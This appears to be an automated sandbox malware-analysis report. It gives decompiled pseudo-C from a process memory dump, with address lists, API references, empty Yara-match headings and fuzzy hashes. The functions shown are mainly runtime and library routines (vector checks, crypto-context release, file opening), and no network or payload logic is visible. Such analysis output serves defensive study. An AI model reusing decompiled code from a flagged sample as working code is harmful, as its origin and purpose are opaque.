                    							 *((intOrPtr*)( *_t342 + 0x20))(_t369, _t369 + 0x18);
                    							_t444 =  *_t342;
                    							E013D2BA0( *((intOrPtr*)(_t471 + 0x60)),  *((intOrPtr*)(_t444 + 0xc))( *((intOrPtr*)(_t444 + 0x18))( *((intOrPtr*)(_t471 + 0x60)),  *_t462)));
                    						}
                    						_t462 = _t462 + 0xc;
                    						_t176 = _t471 + 0x64;
                    						 *_t176 =  *(_t471 + 0x64) - 1;
                    						__eflags =  *_t176;
                    					} while ( *_t176 != 0);
                    					_t460 =  *(_t471 + 0x40);
                    				}
                    				__eflags =  *((intOrPtr*)(_t471 + 8)) -  *((intOrPtr*)(_t471 + 0xc));
                    				_t343 =  *(_t471 + 0x10);
                    				_t356 =  >=  ? _t471 + 0xc : _t471 + 8;
                    				 *((char*)(_t471 - 4)) = 0xa;
                    				_push(_t343);
                    				_t416 =  *( >=  ? _t471 + 0xc : _t471 + 8);
                    				memset(_t343, 0, _t416 << 2);
                    				_t475 = _t474 + 0xc;
                    				__eflags = _t416;
                    				if(_t416 == 0) {
                    					_t222 = L013CDA60();
                    				} else {
                    					_t222 = E013CD9E0();
                    				}
                    				_t476 = _t475 + 4;
                    				_t344 =  *(_t471 + 0x44);
                    				 *((char*)(_t471 - 4)) = 0xb;
                    				__eflags = _t344;
                    				if(_t344 != 0) {
                    					_push( *(_t471 + 0x64));
                    					_push(_t471 + 0x2c);
                    					E013EAA10(_t344, _t460);
                    					_t480 = _t476 + 0x10;
                    					_t237 =  *(_t471 + 0x4c) - _t344 >> 6;
                    					__eflags = _t237 - 0x3ffffff;
                    					if(__eflags > 0) {
                    						_t237 = E013FDA71(_t344, 0, _t416, __eflags);
                    					}
                    					__eflags = _t237 << 6 - 0x1000;
                    					if(_t237 << 6 >= 0x1000) {
                    						__eflags = _t344 & 0x0000001f;
                    						if(__eflags != 0) {
                    							E013FDA71(_t344, 0, _t416, __eflags);
                    						}
                    						_t239 =  *(_t344 - 4);
                    						__eflags = _t239 - _t344;
                    						if(__eflags >= 0) {
                    							_t239 = E013FDA71(_t344, 0, _t416, __eflags);
                    						}
                    						_t348 = _t344 - _t239;
                    						__eflags = _t348 - 4;
                    						if(__eflags < 0) {
                    							_t239 = E013FDA71(_t348, 0, _t416, __eflags);
                    						}
                    						__eflags = _t348 - 0x23;
                    						if(__eflags > 0) {
                    							_t239 = E013FDA71(_t348, 0, _t416, __eflags);
                    						}
                    						_t344 = _t239;
                    					}
                    					_t222 = L013CDA60(_t344);
                    					_t476 = _t480 + 4;
                    				}
                    				_t345 =  *(_t471 + 0x18);
                    				__eflags = _t345;
                    				if(_t345 != 0) {
                    					_push( *(_t471 + 0x64));
                    					_push(_t471 + 0x18);
                    					E013EAAD0(_t345, _t471, _t345,  *((intOrPtr*)(_t471 + 0x1c)));
                    					_t363 =  *((intOrPtr*)(_t471 + 0x20)) - _t345;
                    					_t418 = 0x2aaaaaab * ( *((intOrPtr*)(_t471 + 0x20)) - _t345) >> 0x20 >> 1;
                    					_t228 = (0x2aaaaaab * ( *((intOrPtr*)(_t471 + 0x20)) - _t345) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t471 + 0x20)) - _t345) >> 0x20 >> 1);
                    					__eflags = _t228 - 0x15555555;
                    					if(__eflags > 0) {
                    						_t228 = E013FDA71(_t345, _t363, _t418, __eflags);
                    					}
                    					__eflags = _t228 + _t228 * 2 << 2 - 0x1000;
                    					if(_t228 + _t228 * 2 << 2 >= 0x1000) {
                    						__eflags = _t345 & 0x0000001f;
                    						if(__eflags != 0) {
                    							E013FDA71(_t345, _t363, _t418, __eflags);
                    						}
                    						_t231 =  *(_t345 - 4);
                    						__eflags = _t231 - _t345;
                    						if(__eflags >= 0) {
                    							_t231 = E013FDA71(_t345, _t363, _t418, __eflags);
                    						}
                    						_t347 = _t345 - _t231;
                    						__eflags = _t347 - 4;
                    						if(__eflags < 0) {
                    							_t231 = E013FDA71(_t347, _t363, _t418, __eflags);
                    						}
                    						__eflags = _t347 - 0x23;
                    						if(__eflags > 0) {
                    							_t231 = E013FDA71(_t347, _t363, _t418, __eflags);
                    						}
                    						_t345 = _t231;
                    					}
                    					_t222 = L013CDA60(_t345);
                    				}
                    				 *[fs:0x0] =  *((intOrPtr*)(_t471 - 0xc));
                    				return _t222;
                    			}




























































                    0x013ebab0
                    0x013ebab1
                    0x013ebab8
                    0x013ebaba
                    0x013ebac5
                    0x013ebac6
                    0x013ebacc
                    0x013ebad3
                    0x013ebad7
                    0x013ebadd
                    0x013ebadf
                    0x013ebae2
                    0x013ebae9
                    0x013ebaf0
                    0x013ebaf7
                    0x013ebaf9
                    0x013ebafe
                    0x013ebb01
                    0x013ebb04
                    0x013ebb07
                    0x013ebb0a
                    0x013ebb0d
                    0x013ebb13
                    0x013ebb15
                    0x013ebb1b
                    0x013ebb1d
                    0x013ebb1d
                    0x013ebb22
                    0x013ebb22
                    0x013ebb2b
                    0x013ebb33
                    0x013ebb36
                    0x013ebb3c
                    0x013ebb3f
                    0x013ebb3f
                    0x013ebb42
                    0x013ebb45
                    0x013ebb4c
                    0x013ebb4e
                    0x013ebb54
                    0x013ebb5b
                    0x013ebb60
                    0x013ebb7a
                    0x013ebb7c
                    0x013ebb7f
                    0x013ebb85
                    0x013ebc1d
                    0x013ebc20
                    0x013ebc22
                    0x013ebc80
                    0x013ebc80
                    0x013ebc83
                    0x013ebc86
                    0x013ebc8a
                    0x013ebc8c
                    0x013ebc91
                    0x013ebc96
                    0x00000000
                    0x013ebc96
                    0x00000000
                    0x013ebc24
                    0x013ebc2b
                    0x013ebc2e
                    0x00000000
                    0x013ebc30
                    0x013ebc37
                    0x013ebc3c
                    0x013ebc3f
                    0x00000000
                    0x013ebc45
                    0x013ebc47
                    0x013ebc48
                    0x013ebc52
                    0x013ebc55
                    0x013ebc5d
                    0x013ebc63
                    0x013ebc66
                    0x013ebc68
                    0x013ebc6c
                    0x013ebc74
                    0x013ebc77
                    0x013ebc7d
                    0x00000000
                    0x013ebc7d
                    0x013ebc3f
                    0x013ebc2e
                    0x013ebb93
                    0x013ebb93
                    0x013ebb96
                    0x013ebb9a
                    0x013ebbf8
                    0x013ebbfb
                    0x013ebbfe
                    0x013ebc00
                    0x013ebc03
                    0x013ebc09
                    0x013ebc12
                    0x013ebc17
                    0x013ebc9a
                    0x013ebc9a
                    0x013ebca1
                    0x013ebca9
                    0x013ebcaf
                    0x013ebcb5
                    0x013ebcbb
                    0x013ebcc1
                    0x013ebcc7
                    0x013ebccd
                    0x013ebccd
                    0x00000000
                    0x013ebba8
                    0x013ebbaf
                    0x013ebbb7
                    0x00000000
                    0x013ebbbd
                    0x013ebbc0
                    0x013ebbca
                    0x013ebbdb
                    0x013ebbe0
                    0x013ebbe4
                    0x013ebbec
                    0x013ebbef
                    0x013ebbf2
                    0x013ebbf5
                    0x00000000
                    0x013ebbf5
                    0x013ebbb7
                    0x013ebb9a
                    0x00000000
                    0x013ebcd0
                    0x013ebcd0
                    0x013ebcd4
                    0x013ebcd7
                    0x013ebcda
                    0x013ebce9
                    0x013ebcee
                    0x013ebcf1
                    0x013ebcf4
                    0x013ebcf9
                    0x013ebcfd
                    0x013ebd01
                    0x013ebd01
                    0x013ebd05
                    0x013ebd0e
                    0x013ebd07
                    0x013ebd07
                    0x013ebd07
                    0x013ebd22
                    0x013ebd27
                    0x013ebd2a
                    0x013ebd2d
                    0x013ebd32
                    0x013ebd36
                    0x013ebd3a
                    0x013ebd3a
                    0x013ebd3e
                    0x013ebd47
                    0x013ebd40
                    0x013ebd40
                    0x013ebd40
                    0x013ebd4f
                    0x013ebd57
                    0x013ebd5b
                    0x013ebd64
                    0x013ebd6a
                    0x013ebd79
                    0x013ebd84
                    0x013ebd88
                    0x013ebd89
                    0x013ebd8c
                    0x013ebd8f
                    0x013ebb60
                    0x013ebd98
                    0x013ebd9b
                    0x013ebda0
                    0x013ebda3
                    0x013ebda8
                    0x013ebdb0
                    0x013ebdb0
                    0x013ebdb3
                    0x013ebdb5
                    0x013ebdba
                    0x00000000
                    0x00000000
                    0x013ebdc3
                    0x013ebdc5
                    0x013ebdc8
                    0x013ebdcb
                    0x013ebdce
                    0x013ebdd1
                    0x013ebdd4
                    0x013ebdd8
                    0x013ebdec
                    0x013ebdef
                    0x013ebdf2
                    0x013ebe0f
                    0x013ebe16
                    0x013ebdf4
                    0x013ebdf4
                    0x013ebe05
                    0x013ebe08
                    0x013ebe08
                    0x013ebe1c
                    0x013ebe21
                    0x013ebe24
                    0x013ebe27
                    0x013ebe27
                    0x013ebe2c
                    0x013ebe33
                    0x013ebe33
                    0x013ebe35
                    0x013ebe38
                    0x013ebe3b
                    0x013ebe3e
                    0x013ebe41
                    0x013ebe44
                    0x013ebe44
                    0x013ebe49
                    0x013ebe4d
                    0x013ebe6f
                    0x013ebe4f
                    0x013ebe5e
                    0x013ebe63
                    0x013ebe64
                    0x00000000
                    0x013ebe64
                    0x00000000
                    0x013ebe4d
                    0x013ebe71
                    0x013ebe74
                    0x013ebe7a
                    0x013ebe80
                    0x013ebe80
                    0x013ebe88
                    0x013ebe90
                    0x013ebeb1
                    0x013ebeca
                    0x013ebecc
                    0x013ebecf
                    0x013ebed1
                    0x013ebed4
                    0x013ebed7
                    0x013ebeda
                    0x013ebedf
                    0x013ebedf
                    0x013ebee2
                    0x013ebee6
                    0x013ebeef
                    0x013ebefe
                    0x013ebf01
                    0x013ebf04
                    0x013ebf04
                    0x013ebf04
                    0x013ebf04
                    0x013ebee2
                    0x013ebf0a
                    0x013ebf15
                    0x013ebf1a
                    0x013ebf2e
                    0x013ebf2e
                    0x013ebf33
                    0x013ebf36
                    0x013ebf36
                    0x013ebf36
                    0x013ebf36
                    0x013ebf40
                    0x013ebf40
                    0x013ebf49
                    0x013ebf4f
                    0x013ebf54
                    0x013ebf57
                    0x013ebf5d
                    0x013ebf5e
                    0x013ebf62
                    0x013ebf62
                    0x013ebf64
                    0x013ebf66
                    0x013ebf6f
                    0x013ebf68
                    0x013ebf68
                    0x013ebf68
                    0x013ebf74
                    0x013ebf77
                    0x013ebf7a
                    0x013ebf7e
                    0x013ebf80
                    0x013ebf82
                    0x013ebf88
                    0x013ebf8b
                    0x013ebf93
                    0x013ebf98
                    0x013ebf9b
                    0x013ebfa0
                    0x013ebfa2
                    0x013ebfa2
                    0x013ebfaa
                    0x013ebfaf
                    0x013ebfb1
                    0x013ebfb4
                    0x013ebfb6
                    0x013ebfb6
                    0x013ebfbb
                    0x013ebfbe
                    0x013ebfc0
                    0x013ebfc2
                    0x013ebfc2
                    0x013ebfc7
                    0x013ebfc9
                    0x013ebfcc
                    0x013ebfce
                    0x013ebfce
                    0x013ebfd3
                    0x013ebfd6
                    0x013ebfd8
                    0x013ebfd8
                    0x013ebfdd
                    0x013ebfdd
                    0x013ebfe0
                    0x013ebfe5
                    0x013ebfe5
                    0x013ebfe8
                    0x013ebfeb
                    0x013ebfed
                    0x013ebfef
                    0x013ebff5
                    0x013ebffa
                    0x013ec007
                    0x013ec00e
                    0x013ec015
                    0x013ec017
                    0x013ec01c
                    0x013ec01e
                    0x013ec01e
                    0x013ec029
                    0x013ec02e
                    0x013ec030
                    0x013ec033
                    0x013ec035
                    0x013ec035
                    0x013ec03a
                    0x013ec03d
                    0x013ec03f
                    0x013ec041
                    0x013ec041
                    0x013ec046
                    0x013ec048
                    0x013ec04b
                    0x013ec04d
                    0x013ec04d
                    0x013ec052
                    0x013ec055
                    0x013ec057
                    0x013ec057
                    0x013ec05c
                    0x013ec05c
                    0x013ec05f
                    0x013ec064
                    0x013ec06a
                    0x013ec079

                    APIs
                      • Part of subcall function 013EAE90: std::_Xinvalid_argument.LIBCPMT ref: 013EAEE8
                    • std::_Xinvalid_argument.LIBCPMT ref: 013EBB22
                      • Part of subcall function 013F0F81: std::invalid_argument::invalid_argument.LIBCONCRT ref: 013F0F8D
                      • Part of subcall function 013F0F81: __CxxThrowException@8.LIBVCRUNTIME ref: 013F0F9B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Xinvalid_argumentstd::_$Exception@8Throwstd::invalid_argument::invalid_argument
                    • String ID: vector<T> too long
                    • API String ID: 1284171080-3788999226
                    • Opcode ID: 1e310602d29b832bc7bd6eb236ddbd30b77fc7e837e2c0503d60abb0b251951d
                    • Instruction ID: f40f8c34cbff8d9c9023ccdbf5d3e947146283c364e5e4fc36c3bc9fd77a701d
                    • Opcode Fuzzy Hash: 1e310602d29b832bc7bd6eb236ddbd30b77fc7e837e2c0503d60abb0b251951d
                    • Instruction Fuzzy Hash: 0212CD72A002599FDF19CF6CC984AADBBE5BF98308F184129F94697385D731ED45CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E013EA3F0() {
                    				int _v8;
                    				char _v16;
                    				HCRYPTPROV* _v20;
                    				void* __ecx;
                    				void* __esi;
                    				signed int _t10;
                    				intOrPtr _t14;
                    				long** _t15;
                    				HCRYPTPROV* _t16;
                    				long* _t18;
                    				long** _t21;
                    				signed int _t26;
                    				int _t35;
                    				void* _t37;
                    				long** _t39;
                    				signed int _t41;
                    				void* _t42;
                    
                    				_push(0xffffffff);
                    				_push(E01417D1F);
                    				_push( *[fs:0x0]);
                    				_push(_t37);
                    				_t10 =  *0x1435234; // 0x78d9f939
                    				_push(_t10 ^ _t41);
                    				 *[fs:0x0] =  &_v16;
                    				_t26 =  *0x1439f68; // 0x0
                    				_t14 =  *0x1439a5c; // 0x80000001
                    				if(_t14 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t26 * 4)) + 4))) {
                    					E013F2587(0x1439a5c);
                    					_t42 = _t42 + 4;
                    					_t46 =  *0x1439a5c - 0xffffffff;
                    					if( *0x1439a5c == 0xffffffff) {
                    						 *0x1439a58 = 0;
                    						E013F243E(_t46, 0x1418bc0);
                    						E013F2548(_t37, 0x1439a5c);
                    						_t42 = _t42 + 8;
                    					}
                    				}
                    				_t15 =  *0x1439a58; // 0xaf7680
                    				_t47 = _t15;
                    				if(_t15 != 0) {
                    					L14:
                    					 *[fs:0x0] = _v16;
                    					return _t15;
                    				} else {
                    					_t16 = E013F21A5(_t47, 4);
                    					_v20 = _t16;
                    					_v8 = 0;
                    					if(_t16 == 0) {
                    						_t39 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t21 = E013E9FC0(_t16); // executed
                    						_t39 = _t21;
                    					}
                    					_t35 =  *0x1439a58; // 0xaf7680
                    					if(_t35 == 0) {
                    						 *0x1439a58 = _t39;
                    						_t15 = _t39;
                    						goto L14;
                    					} else {
                    						if(_t39 != 0) {
                    							_t18 =  *_t39;
                    							if(_t18 != 0) {
                    								CryptReleaseContext(_t18, 0);
                    							}
                    							_push(4);
                    							E013F21D8(_t39);
                    						}
                    						 *[fs:0x0] = _v16;
                    						return _t35;
                    					}
                    				}
                    			}




















                    0x013ea3f3
                    0x013ea3f5
                    0x013ea400
                    0x013ea402
                    0x013ea404
                    0x013ea40b
                    0x013ea40f
                    0x013ea41b
                    0x013ea424
                    0x013ea42f
                    0x013ea436
                    0x013ea43b
                    0x013ea43e
                    0x013ea445
                    0x013ea44c
                    0x013ea456
                    0x013ea460
                    0x013ea465
                    0x013ea465
                    0x013ea445
                    0x013ea468
                    0x013ea46d
                    0x013ea46f
                    0x013ea4d9
                    0x013ea4dc
                    0x013ea4e9
                    0x013ea471
                    0x013ea473
                    0x013ea47b
                    0x013ea47e
                    0x013ea487
                    0x013ea494
                    0x013ea494
                    0x013ea489
                    0x013ea48b
                    0x013ea490
                    0x013ea490
                    0x013ea496
                    0x013ea49e
                    0x013ea4d1
                    0x013ea4d7
                    0x00000000
                    0x013ea4a0
                    0x013ea4a2
                    0x013ea4a4
                    0x013ea4a8
                    0x013ea4ad
                    0x013ea4ad
                    0x013ea4b3
                    0x013ea4b6
                    0x013ea4bb
                    0x013ea4c3
                    0x013ea4d0
                    0x013ea4d0
                    0x013ea49e

                    APIs
                    • new.LIBCMT ref: 013EA473
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013EA4AD
                      • Part of subcall function 013F243E: __onexit.LIBCMT ref: 013F2444
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease__onexit
                    • String ID:
                    • API String ID: 3499210788-0
                    • Opcode ID: 1b6dba219018459dcbfeeb0b9f514cf476d9867dac1dba628853ae0c70963cbd
                    • Instruction ID: 849b643b0a9056de2809f8478129212ab2642548386901daf7b16fbdd71bece9
                    • Opcode Fuzzy Hash: 1b6dba219018459dcbfeeb0b9f514cf476d9867dac1dba628853ae0c70963cbd
                    • Instruction Fuzzy Hash: CD21E572B04395DBDB20EF1CD809B5AB7E8EB54B18F14022EEA05A7794E7B494018F90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E013EA4F0(intOrPtr* __ecx, int _a8) {
                    				char _v8;
                    				char _v16;
                    				long* _v20;
                    				char _v24;
                    				void* _v28;
                    				char _v32;
                    				char _v36;
                    				void* __edi;
                    				signed int _t22;
                    				void* _t25;
                    				long* _t29;
                    				void* _t35;
                    				void* _t38;
                    				intOrPtr* _t52;
                    				int _t57;
                    				signed int _t59;
                    				void* _t60;
                    				void* _t61;
                    
                    				_push(0xffffffff);
                    				_push(E01417D56);
                    				_push( *[fs:0x0]);
                    				_t61 = _t60 - 0x18;
                    				_t22 =  *0x1435234; // 0x78d9f939
                    				_push(_t22 ^ _t59);
                    				 *[fs:0x0] =  &_v16;
                    				_t52 = __ecx;
                    				_t57 = _a8;
                    				_v36 = 0xffffffff;
                    				_v32 = _t57;
                    				if(_t57 != 0) {
                    					_t25 = E013CD9F0(__ecx, __ecx, __eflags, _t57);
                    					_t61 = _t61 + 4;
                    					_t38 = _t25;
                    				} else {
                    					_t38 = 0;
                    				}
                    				_v28 = _t38;
                    				_v8 = 2;
                    				E013CB0B0( &_v24, 1);
                    				_v24 = 0x141ddf0;
                    				E013E9FC0( &_v20); // executed
                    				_v8 = 3;
                    				E013EA350(_t38, _t57); // executed
                    				_t29 = _v20;
                    				_v8 = 2;
                    				_v24 = 0x141ddf0;
                    				if(_t29 != 0) {
                    					CryptReleaseContext(_t29, 0);
                    				}
                    				 *((intOrPtr*)( *_t52 + 0xc))(_t38, _t57);
                    				_v8 = 4;
                    				_t46 =  <=  ?  &_v32 :  &_v36;
                    				_t47 =  *( <=  ?  &_v32 :  &_v36);
                    				memset(_t38, 0,  *( <=  ?  &_v32 :  &_v36) << 0);
                    				_t35 = L013CDA60(_t38);
                    				 *[fs:0x0] = _v16;
                    				return _t35;
                    			}





















                    0x013ea4f3
                    0x013ea4f5
                    0x013ea500
                    0x013ea501
                    0x013ea507
                    0x013ea50e
                    0x013ea512
                    0x013ea518
                    0x013ea51a
                    0x013ea51d
                    0x013ea524
                    0x013ea529
                    0x013ea530
                    0x013ea535
                    0x013ea538
                    0x013ea52b
                    0x013ea52b
                    0x013ea52b
                    0x013ea53a
                    0x013ea542
                    0x013ea549
                    0x013ea551
                    0x013ea558
                    0x013ea562
                    0x013ea566
                    0x013ea56b
                    0x013ea56e
                    0x013ea572
                    0x013ea57b
                    0x013ea580
                    0x013ea580
                    0x013ea58c
                    0x013ea592
                    0x013ea5a1
                    0x013ea5a7
                    0x013ea5a9
                    0x013ea5ab
                    0x013ea5b6
                    0x013ea5c4

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000,00000001), ref: 013EA580
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 321190534baaca3a0846c996a67b3eed8b2c9001751839a29ebb6d3760d27a42
                    • Instruction ID: 62b2aa115e6cd2196719764a6a5863945b07939235022bc06cea17b327c83976
                    • Opcode Fuzzy Hash: 321190534baaca3a0846c996a67b3eed8b2c9001751839a29ebb6d3760d27a42
                    • Instruction Fuzzy Hash: F22190B5901219EBCF10DF98D948BAEBBF8EB15768F104169E915A33C0D7345A09CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00033616,013F2DBD), ref: 013F360F
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: ea1848ede3d6ceabc731451452e9cb29bad1ee52c883f1367073860e3ef2dbe8
                    • Instruction ID: 5f1a8f635dbafab2cf6a930cdb49adf1bd170b5d1cc0cbec0cf0925228a53da0
                    • Opcode Fuzzy Hash: ea1848ede3d6ceabc731451452e9cb29bad1ee52c883f1367073860e3ef2dbe8
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 41%
                    			E01411CF2(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v36;
                    				signed int _v44;
                    				void _v48;
                    				char _v72;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t114;
                    				void* _t122;
                    				signed int _t123;
                    				signed char _t124;
                    				signed int _t134;
                    				intOrPtr _t164;
                    				intOrPtr _t180;
                    				signed int* _t190;
                    				signed int _t192;
                    				char _t197;
                    				signed int _t203;
                    				signed int _t206;
                    				signed int _t215;
                    				signed int _t217;
                    				signed int _t219;
                    				signed int _t225;
                    				signed int _t227;
                    				signed int _t234;
                    				signed int _t235;
                    				signed int _t237;
                    				signed int _t239;
                    				signed char _t242;
                    				intOrPtr _t245;
                    				void* _t248;
                    				void* _t252;
                    				void* _t262;
                    				signed int _t263;
                    				signed int _t266;
                    				signed int _t269;
                    				signed int _t270;
                    				void* _t272;
                    				void* _t274;
                    				void* _t275;
                    				void* _t277;
                    				void* _t278;
                    				void* _t280;
                    				void* _t284;
                    
                    				_t262 = E01411AC6(__ecx,  &_v72, _a16, _a20, _a24);
                    				_t192 = 6;
                    				memcpy( &_v48, _t262, _t192 << 2);
                    				_t274 = _t272 + 0x1c;
                    				_t248 = _t262 + _t192 + _t192;
                    				_t263 = _t262 | 0xffffffff;
                    				if(_v36 != _t263) {
                    					_t114 = E0140DBED(_t248, _t263, __eflags);
                    					_t190 = _a8;
                    					 *_t190 = _t114;
                    					__eflags = _t114 - _t263;
                    					if(_t114 != _t263) {
                    						_v20 = _v20 & 0x00000000;
                    						_v24 = 0xc;
                    						_t275 = _t274 - 0x18;
                    						 *_a4 = 1;
                    						_push(6);
                    						_v16 =  !(_a16 >> 7) & 1;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t275,  &_v48, 1 << 2);
                    						_t197 = 0;
                    						_t122 = E01411A31(); // executed
                    						_t252 = _t122;
                    						_t277 = _t275 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							L11:
                    							_t123 = GetFileType(_t252); // executed
                    							__eflags = _t123;
                    							if(_t123 != 0) {
                    								__eflags = _t123 - 2;
                    								if(_t123 != 2) {
                    									__eflags = _t123 - 3;
                    									_t124 = _v48;
                    									if(_t123 == 3) {
                    										_t124 = _t124 | 0x00000008;
                    										__eflags = _t124;
                    									}
                    								} else {
                    									_t124 = _v48 | 0x00000040;
                    								}
                    								_v5 = _t124;
                    								E0140DB36(_t197,  *_t190, _t252);
                    								_t242 = _v5 | 0x00000001;
                    								_v5 = _t242;
                    								_v48 = _t242;
                    								 *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                    								_t203 =  *_t190;
                    								_t205 = (_t203 & 0x0000003f) * 0x30;
                    								__eflags = _a16 & 0x00000002;
                    								 *((char*)( *((intOrPtr*)(0x143a740 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                    								if((_a16 & 0x00000002) == 0) {
                    									L20:
                    									_v6 = 0;
                    									_push( &_v6);
                    									_push(_a16);
                    									_t278 = _t277 - 0x18;
                    									_t206 = 6;
                    									_push( *_t190);
                    									memcpy(_t278,  &_v48, _t206 << 2);
                    									_t134 = E014117E4(_t190,  &_v48 + _t206 + _t206,  &_v48);
                    									_t280 = _t278 + 0x30;
                    									__eflags = _t134;
                    									if(__eflags == 0) {
                    										 *((char*)( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                    										 *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                    										__eflags = _v5 & 0x00000048;
                    										if((_v5 & 0x00000048) == 0) {
                    											__eflags = _a16 & 0x00000008;
                    											if((_a16 & 0x00000008) != 0) {
                    												_t225 =  *_t190;
                    												_t227 = (_t225 & 0x0000003f) * 0x30;
                    												_t164 =  *((intOrPtr*)(0x143a740 + (_t225 >> 6) * 4));
                    												_t87 = _t164 + _t227 + 0x28;
                    												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                    												__eflags =  *_t87;
                    											}
                    										}
                    										_t266 = _v44;
                    										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                    										if((_t266 & 0xc0000000) != 0xc0000000) {
                    											L31:
                    											__eflags = 0;
                    											return 0;
                    										} else {
                    											__eflags = _a16 & 0x00000001;
                    											if((_a16 & 0x00000001) == 0) {
                    												goto L31;
                    											}
                    											CloseHandle(_v12);
                    											_v44 = _t266 & 0x7fffffff;
                    											_t215 = 6;
                    											_push( &_v24);
                    											_push(_a12);
                    											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                    											_t245 = E01411A31();
                    											__eflags = _t245 - 0xffffffff;
                    											if(_t245 != 0xffffffff) {
                    												_t217 =  *_t190;
                    												_t219 = (_t217 & 0x0000003f) * 0x30;
                    												__eflags = _t219;
                    												 *((intOrPtr*)( *((intOrPtr*)(0x143a740 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                    												goto L31;
                    											}
                    											E013FDB04(GetLastError());
